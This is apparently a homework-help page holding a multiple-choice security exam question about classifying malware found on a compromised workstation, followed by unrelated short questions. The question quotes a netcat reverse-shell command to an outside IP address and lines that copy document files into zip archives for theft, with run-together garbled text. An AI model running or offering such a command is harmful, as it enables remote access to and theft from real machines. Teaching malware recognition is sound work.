subject

Asecurity analyst believes an employee's workstation has been compromised. the analyst reviews the system logs, but does not find any attempted logins. the analyst then runs the diff command, comparing the c: \windows\system32 directory and the installed cache directory. the analyst finds a series of files that look suspicious. one of the files contains the following commands: cmd /c $temp$\nc -e cmd. exe 34.100.43.230copy *.doc> $temp$\docfiles. zipcopy *.xls> $temp$\xlsfiles. zipcopy *.pdf> $temp$\pdffiles. zipwhich of the following types of malware was used? a. wormb. spywarec. logic bombd. backdoor

ansver
Answers: 3

Another question on Computers and Technology

question
Computers and Technology, 22.06.2019 21:30
Im doing this last minute and literally none of my neighbors or people that my dad works with use excel so if anyone could me make up an example
Answers: 1
question
Computers and Technology, 23.06.2019 17:20
What is the best assassins creed game?
Answers: 2
question
Computers and Technology, 24.06.2019 06:30
Some peer-to-peer networks have a server and some don't. true false
Answers: 2
question
Computers and Technology, 24.06.2019 14:00
Text or graphics that print at the bottom of every page are called footings footers headers headings
Answers: 1
You know the right answer?
Asecurity analyst believes an employee's workstation has been compromised. the analyst reviews the s...
Questions